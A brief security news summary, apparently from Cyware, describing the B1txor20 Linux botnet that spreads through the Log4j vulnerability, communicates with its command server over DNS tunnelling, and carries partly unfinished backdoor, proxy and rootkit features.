Researchers have observed a new botnet malware that exploits the Log4J vulnerability to target Linux systems. It attempts to steal sensitive data, creating reverse shells, and install rootkits.

The B1txor20 botnet

According to 360 Netlab, the botnet, named B1txor20, was first spotted on February 9.
  • It is designed to target Linux ARM, X64 CPU architecture devices.
  • It exploits the vulnerability in the Apache Log4j logging library to target new host devices.
  • In addition to usual backdoor capabilities, this malware is capable of several additional functionalities, such as Socket5 proxy, downloading other malware, executing an arbitrary command, and installing rootkits.

DNS tunneling-based attack

B1txor20 malware uses DNS tunneling for communication with its C2 server which makes it difficult to detect.
  • The bot sends the stolen information, results of any command execution, or any other information to its C2 server in form of a DNS request.
  • In response to this request, the C2 sends the desired payload back to the victim device via DNS protocol.

Yet to mature malware

The malware possesses many additional features which are either not enabled or have a buggy code, thus, suggesting that it is under development.
  • The malware has the code for functionalities such as uploading specific info and delivering information via Unix domain socket, which is never used during execution.
  • Moreover, some functionalities are buggy when implemented. It deletes the socket file after binding the domain socket, without making any effective use of this socket binding.

Ending notes

The use of DNS tunneling and exploitation of Log4J vulnerability is a bit old yet effective way by the botnet actors. The work-in-progress modules indicate that its developers are interested in developing this malware further, making it a potential threat for Linux-based IoT devices.
Cyware Publisher

Publisher

Cyware